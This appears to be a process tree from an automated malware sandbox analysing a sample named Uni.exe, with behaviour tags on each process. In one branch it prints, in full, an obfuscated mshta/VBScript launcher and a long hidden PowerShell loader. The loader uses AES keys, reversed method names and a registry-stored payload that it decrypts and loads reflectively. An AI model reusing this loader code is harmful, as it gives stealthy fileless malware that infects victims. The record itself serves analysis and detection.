C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1164
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3104
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-iPXLtdZOoVPpQctgyOAx4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-iPXLtdZOoVPpQctgyOAx4312:&#<?=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3020
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function GJCWl($cEyBL){ $unHWr=[System.Security.Cryptography.Aes]::Create(); $unHWr.Mode=[System.Security.Cryptography.CipherMode]::CBC; $unHWr.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $unHWr.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas='); $unHWr.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ=='); $idsQy=$unHWr.('rotpyrceDetaerC'[-1..-15] -join '')(); $bieDo=$idsQy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEyBL, 0, $cEyBL.Length); $idsQy.Dispose(); $unHWr.Dispose(); $bieDo;}function kQaAi($cEyBL){ $zZRTE=New-Object System.IO.MemoryStream(,$cEyBL); $Hdpyd=New-Object System.IO.MemoryStream; $lIaZn=New-Object System.IO.Compression.GZipStream($zZRTE, [IO.Compression.CompressionMode]::Decompress); $lIaZn.CopyTo($Hdpyd); $lIaZn.Dispose(); $zZRTE.Dispose(); $Hdpyd.Dispose(); $Hdpyd.ToArray();}function rpOXM($cEyBL,$JnGhx){ $JmlrM=[System.Reflection.Assembly]::Load([byte[]]$cEyBL); $LSfbk=$JmlrM.EntryPoint; $LSfbk.Invoke($null, $JnGhx);}$unHWr1 = New-Object System.Security.Cryptography.AesManaged;$unHWr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$unHWr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$unHWr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas=');$unHWr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ==');$YjGoD = $unHWr1.('rotpyrceDetaerC'[-1..-15] -join '')();$xVSpn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('64+SJstNnl42MFis9WiPXw==');$xVSpn = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn, 0, $xVSpn.Length);$xVSpn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn);$FgKqS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNuYazHe3dCIsY0jnF1Nle8RXVA5unyb7oJ5hSIbTxU=');$FgKqS = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FgKqS, 0, $FgKqS.Length);$FgKqS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FgKqS);$sGPvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CbEZjgGn6vTNnUEy8ZgbbQ==');$sGPvf = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sGPvf, 0, $sGPvf.Length);$sGPvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sGPvf);$oXWXA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SyN9/5YYP3ajQwN5APMvkN/Xv1jhNdF/xyYcWBoTY5XyoMDdqOiNp1mwcwetpT1xEzkq4cXm70nS/KTtx7Up0IwR/sNOMtVe68T8VHRJud4RAdci+oDgaoKV3n8Joumy6NLr08Y1aHYaYx4YjpmLpikwsvzaz+gG+9AkawBaLqdBXyhLOEbuLpluuj8dPDwESXr+Zym/XsVgluAogyofnNS7PL/5nRCfqUEgsYclKjIeFsc/kwHkGyQZq/t9XZLF7mjgfeXU144OngUZxtdLuygw2z9NMmgVPKNp0uIvdlewZeZXV0n3HlkyQMXIA0DL7UQIhIIqok3iFR5cs/GJbfrbJsa+WvhJkp8Wh6FW71XA1XKKRAaPgY6iiA+Mu2Mc0v3kB1lDXMsunLV5aGwXpmJl4nBPao4c7cf+dJtp/cE=');$oXWXA = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oXWXA, 0, $oXWXA.Length);$oXWXA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oXWXA);$clakB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q8hqIpA7Ts9H9zAzzQNp4Q==');$clakB = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($clakB, 0, $clakB.Length);$clakB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($clakB);$XkTdu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g/3rWh+/0YUwA/716Rzsbw==');$XkTdu = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XkTdu, 0, $XkTdu.Length);$XkTdu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XkTdu);$BKojp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YsdRdjTdWBUxWLjOy8/Plg==');$BKojp = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BKojp, 0, $BKojp.Length);$BKojp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BKojp);$gqOpI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jxa4xLh18DJxJmw24Psq6Q==');$gqOpI = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gqOpI, 0, $gqOpI.Length);$gqOpI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gqOpI);$WThIt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cmYtuLFqrcr99fGgwO43iQ==');$WThIt = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WThIt, 0, $WThIt.Length);$WThIt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WThIt);$xVSpn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pJXgn+vDQSGToA7730j7Fw==');$xVSpn0 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn0, 0, $xVSpn0.Length);$xVSpn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn0);$xVSpn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lYwtu2Tib2hvTCO1fALnaQ==');$xVSpn1 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn1, 0, $xVSpn1.Length);$xVSpn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn1);$xVSpn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QJq5J0Hl3Xh6d0lBiKSL0g==');$xVSpn2 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn2, 0, $xVSpn2.Length);$xVSpn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn2);$xVSpn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IEiC2GlmI4WLeVWn4tAe+w==');$xVSpn3 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn3, 0, $xVSpn3.Length);$xVSpn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn3);$YjGoD.Dispose();$unHWr1.Dispose();if (@(get-process -ea silentlycontinue $xVSpn3).count -gt 1) {exit};$wglzk = [Microsoft.Win32.Registry]::$gqOpI.$BKojp($xVSpn).$XkTdu($FgKqS);$HuMhh=[string[]]$wglzk.Split('\');$xczlD=kQaAi(GJCWl([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HuMhh[1])));rpOXM $xczlD (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NQEzN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HuMhh[0]);$unHWr = New-Object System.Security.Cryptography.AesManaged;$unHWr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$unHWr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$unHWr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas=');$unHWr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ==');$idsQy = $unHWr.('rotpyrceDetaerC'[-1..-15] -join '')();$NQEzN = $idsQy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NQEzN, 0, $NQEzN.Length);$idsQy.Dispose();$unHWr.Dispose();$zZRTE = New-Object System.IO.MemoryStream(, $NQEzN);$Hdpyd = New-Object System.IO.MemoryStream;$lIaZn = New-Object System.IO.Compression.GZipStream($zZRTE, [IO.Compression.CompressionMode]::$xVSpn1);$lIaZn.$WThIt($Hdpyd);$lIaZn.Dispose();$zZRTE.Dispose();$Hdpyd.Dispose();$NQEzN = $Hdpyd.ToArray();$GmsvD = $oXWXA | IEX;$JmlrM = $GmsvD::$xVSpn2($NQEzN);$LSfbk = $JmlrM.EntryPoint;$LSfbk.$xVSpn0($null, (, [string[]] ($sGPvf)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{2e6132b9-bbe3-406b-ab69-c112e00e0cd6}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4852).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GJCWl($cEyBL){ $unHWr=[System.Security.Cryptography.Aes]::Create(); $unHWr.Mode=[System.Security.Cryptography.CipherMode]::CBC; $unHWr.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $unHWr.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas='); $unHWr.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ=='); $idsQy=$unHWr.('rotpyrceDetaerC'[-1..-15] -join '')(); $bieDo=$idsQy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEyBL, 0, $cEyBL.Length); $idsQy.Dispose(); $unHWr.Dispose(); $bieDo;}function kQaAi($cEyBL){ $zZRTE=New-Object System.IO.MemoryStream(,$cEyBL); $Hdpyd=New-Object System.IO.MemoryStream; $lIaZn=New-Object System.IO.Compression.GZipStream($zZRTE, [IO.Compression.CompressionMode]::Decompress); $lIaZn.CopyTo($Hdpyd); $lIaZn.Dispose(); $zZRTE.Dispose(); $Hdpyd.Dispose(); $Hdpyd.ToArray();}function rpOXM($cEyBL,$JnGhx){ $JmlrM=[System.Reflection.Assembly]::Load([byte[]]$cEyBL); $LSfbk=$JmlrM.EntryPoint; $LSfbk.Invoke($null, $JnGhx);}$unHWr1 = New-Object System.Security.Cryptography.AesManaged;$unHWr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$unHWr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$unHWr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas=');$unHWr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ==');$YjGoD = $unHWr1.('rotpyrceDetaerC'[-1..-15] -join '')();$xVSpn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('64+SJstNnl42MFis9WiPXw==');$xVSpn = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn, 0, $xVSpn.Length);$xVSpn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn);$FgKqS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNuYazHe3dCIsY0jnF1Nle8RXVA5unyb7oJ5hSIbTxU=');$FgKqS = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FgKqS, 0, $FgKqS.Length);$FgKqS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FgKqS);$sGPvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CbEZjgGn6vTNnUEy8ZgbbQ==');$sGPvf = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sGPvf, 0, $sGPvf.Length);$sGPvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sGPvf);$oXWXA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SyN9/5YYP3ajQwN5APMvkN/Xv1jhNdF/xyYcWBoTY5XyoMDdqOiNp1mwcwetpT1xEzkq4cXm70nS/KTtx7Up0IwR/sNOMtVe68T8VHRJud4RAdci+oDgaoKV3n8Joumy6NLr08Y1aHYaYx4YjpmLpikwsvzaz+gG+9AkawBaLqdBXyhLOEbuLpluuj8dPDwESXr+Zym/XsVgluAogyofnNS7PL/5nRCfqUEgsYclKjIeFsc/kwHkGyQZq/t9XZLF7mjgfeXU144OngUZxtdLuygw2z9NMmgVPKNp0uIvdlewZeZXV0n3HlkyQMXIA0DL7UQIhIIqok3iFR5cs/GJbfrbJsa+WvhJkp8Wh6FW71XA1XKKRAaPgY6iiA+Mu2Mc0v3kB1lDXMsunLV5aGwXpmJl4nBPao4c7cf+dJtp/cE=');$oXWXA = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oXWXA, 0, $oXWXA.Length);$oXWXA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oXWXA);$clakB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q8hqIpA7Ts9H9zAzzQNp4Q==');$clakB = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($clakB, 0, $clakB.Length);$clakB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($clakB);$XkTdu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g/3rWh+/0YUwA/716Rzsbw==');$XkTdu = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XkTdu, 0, $XkTdu.Length);$XkTdu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XkTdu);$BKojp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YsdRdjTdWBUxWLjOy8/Plg==');$BKojp = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BKojp, 0, $BKojp.Length);$BKojp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BKojp);$gqOpI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jxa4xLh18DJxJmw24Psq6Q==');$gqOpI = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gqOpI, 0, $gqOpI.Length);$gqOpI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gqOpI);$WThIt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cmYtuLFqrcr99fGgwO43iQ==');$WThIt = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WThIt, 0, $WThIt.Length);$WThIt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WThIt);$xVSpn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pJXgn+vDQSGToA7730j7Fw==');$xVSpn0 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn0, 0, $xVSpn0.Length);$xVSpn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn0);$xVSpn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lYwtu2Tib2hvTCO1fALnaQ==');$xVSpn1 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn1, 0, $xVSpn1.Length);$xVSpn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn1);$xVSpn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QJq5J0Hl3Xh6d0lBiKSL0g==');$xVSpn2 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn2, 0, $xVSpn2.Length);$xVSpn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn2);$xVSpn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IEiC2GlmI4WLeVWn4tAe+w==');$xVSpn3 = $YjGoD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xVSpn3, 0, $xVSpn3.Length);$xVSpn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xVSpn3);$YjGoD.Dispose();$unHWr1.Dispose();if (@(get-process -ea silentlycontinue $xVSpn3).count -gt 1) {exit};$wglzk = [Microsoft.Win32.Registry]::$gqOpI.$BKojp($xVSpn).$XkTdu($FgKqS);$HuMhh=[string[]]$wglzk.Split('\');$xczlD=kQaAi(GJCWl([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HuMhh[1])));rpOXM $xczlD (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NQEzN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HuMhh[0]);$unHWr = New-Object System.Security.Cryptography.AesManaged;$unHWr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$unHWr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$unHWr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oTkI21qMQMApGK+j7sQMNVTE98rhx+LSuahrU7KOZas=');$unHWr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gtsUbDDfu2j3U3fUnPKEuQ==');$idsQy = $unHWr.('rotpyrceDetaerC'[-1..-15] -join '')();$NQEzN = $idsQy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NQEzN, 0, $NQEzN.Length);$idsQy.Dispose();$unHWr.Dispose();$zZRTE = New-Object System.IO.MemoryStream(, $NQEzN);$Hdpyd = New-Object System.IO.MemoryStream;$lIaZn = New-Object System.IO.Compression.GZipStream($zZRTE, [IO.Compression.CompressionMode]::$xVSpn1);$lIaZn.$WThIt($Hdpyd);$lIaZn.Dispose();$zZRTE.Dispose();$Hdpyd.Dispose();$NQEzN = $Hdpyd.ToArray();$GmsvD = $oXWXA | IEX;$JmlrM = $GmsvD::$xVSpn2($NQEzN);$LSfbk = $JmlrM.EntryPoint;$LSfbk.$xVSpn0($null, (, [string[]] ($sGPvf)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{283ffac1-54af-4d48-ae6c-5cd94483788f}5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e26ab3b1-684d-46d7-80ae-0efcf9e45e26}5⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d6d1c597-f5c7-4181-b350-7af964907bc2}5⤵PID:3872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 4566⤵
- Drops file in Windows directory
- Program crash
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:5180
-
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{20f0d97e-876f-4f39-93a0-970790e3ae8d}5⤵
- System Location Discovery: System Language Discovery
PID:3212
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{7a33b3da-d24e-4ba8-8fe2-97512952fe4e}5⤵
- System Location Discovery: System Language Discovery
PID:2208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 4606⤵
- Program crash
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:4976
-
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{a2a64121-1731-4ff0-9ce2-cae95b6d0506}5⤵PID:4380
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{cb9c12cd-0be7-4d6d-a8bf-3b8b3af26200}5⤵PID:6032
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{9c46445c-f691-4c8e-a67b-9f10c87dbeab}5⤵
- System Location Discovery: System Language Discovery
PID:5764
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1384
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2652
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2952
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3356
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SYSTEM32\cmd.execmd /c "Uni.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1380
-
-
